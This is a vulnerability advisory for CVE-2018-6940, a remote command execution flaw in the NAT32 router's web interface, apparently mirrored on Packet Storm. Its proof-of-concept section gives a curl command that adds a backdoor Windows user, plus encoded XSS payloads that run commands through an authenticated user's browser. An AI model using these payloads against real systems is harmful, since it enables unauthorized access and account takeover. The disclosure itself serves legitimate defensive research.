exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

NAT32 Build 22284 Remote Command Execution

NAT32 Build 22284 Remote Command Execution
Posted Feb 14, 2018
Authored by hyp3rlinx | Site hyp3rlinx.altervista.org

NAT32 Build 22284 suffers from a remote command execution vulnerability.

tags | exploit, remote
advisories | CVE-2018-6940
SHA-256 | 5e9d5778308626f253822fbf37640788d7ed14246ade5b5d62dbca929e95d132

NAT32 Build 22284 Remote Command Execution

Change Mirror Download
[+] Credits: hyp3rlinx  
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAT32-REMOTE-COMMAND-EXECUTION-CVE-2018-6940.txt
[+] ISR: Apparition Security

[-_-] D1rty0tis


Vendor:
=============
www.nat32.com


Product:
=================
NAT32 Build (22284)


NAT32 is a versatile IP Router implemented as a WIN32 application.


Vulnerability Type:
===================
Remote Command Execution


CVE Reference:
==============
CVE-2018-6940


Security Issue:
================
NAT32 listens on Port 8080 for its Web interface.

C:\>netstat -ano | findstr 8080
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 3720


If the 'Password Checking' (BASIC authentication) feature is NOT enabled (user must select it under config tab) then remote attackers who can reach
NAT32 can potentially execute arbitrary commands, if authentication is enabled they will get 'Unauthorized' server reply, however, read on ...

e.g.

Add user account.

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add"
<!DOCTYPE html>
<html>
<body><pre>run start net user D1rty0Tis abc123 /add Done
</pre></body></html>


If NAT32 'Password Checking' feature IS enabled, remote attackers can STILL potentially issue arbitrary commands exploiting a
Cross Site Scripting vulnerability in the HTTPD code of NAT32, if authenticated NAT32 users click a malicious link
or visit an attacker controlled webpage.

Also worth mentioning, NAT32 implements BASIC authentication which pass BASE64 Encoded credentials which can be easily
revealed if sniffed on network.

When 'Password Checking' is enabled attackers using Ajax calls via XSS would need to use a combination of '%0D%0A' and double encoding
to deal with 'white-space' in order for the payload to stay intact.

%25 for '%' sign then 20 (%2520) = %20, using %20 or %2B will not cut it, however '%0D%0A' (CRLF) and '%2520' encoding serves us well.

NAT32 has an interesting Command 'EXECR' that can allow attackers to capture Command output response from the server to see right away if an
attack was success or not.

e.g.

Add account and get response (EXECR)

HTTP Response:
<!DOCTYPE html>
<html>
<body><pre>The command completed successfully.

execr net user D1rty0Tis abc123 /add Done
</pre></body></html>


The NAT32 'winroute' Command will return host route information.

XSS response

e.g.

<!DOCTYPE html>
<html>
<body><pre>Destination Mask Nexthop Metric IfIndex Type Proto Age
0.0.0.0 0.0.0.0 192.168.1.2 10 b 4 3 21:41 [min:sec]
127.0.0.0 255.0.0.0 127.0.0.1 306 1 3 3 22:04 [min:sec]
127.0.0.1 255.255.255.255 127.0.0.1 306 1 3 3 22:04 [min:sec]
127.255.255.255 255.255.255.255 127.0.0.1 306 1 3 3 22:04 [min:sec]
</pre></body></html>


Exploit/POC:
=============
NET32 Password Checking not enabled...

C:\>curl "http://x.x.x.x:8080/shell?cmd=run+net+user+D1rty0Tis+abc123+/add"


NAT32 BASIC authentication enabled use XSS...

Add backdoor account and capture CMD output using NAT32 'execr' shell command.
http://x.x.x.x:8080/shell?cmd=<script>var%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open('GET','http://x.x.x.x:8080/shell?cmd=execr%2520net%2520user%2520D1rty0Tis%2520abc123%2520/add',true);xhr.send(null);</script>

Get Windows Routes (info disclosure):
http://x.x.x.x:8080/shell?cmd=%3Cscript%3Evar%0D%0Axhr=new%0D%0AXMLHttpRequest();xhr.onreadystatechange=function(){if(xhr.status==200){alert(xhr.responseText);}};xhr.open(%27GET%27,%27http://x.x.x.x:8080/shell?cmd=winroute%27,true);xhr.send(null);%3C/script%3E



Network Access:
===============
Remote


Severity:
=========
High


Disclosure Timeline:
=============================
Vendor Notification: February 9, 2018
Vendor acknowledgement: February 9, 2018
Vendor "I've decided to remove the HTTPD code from Build 22284 of NAT32" : February 12, 2018
www.nat32.com website reads "NAT32 Version 2.2 Build 22284 is temporarily unavailable." : February 13, 2018
February 14, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close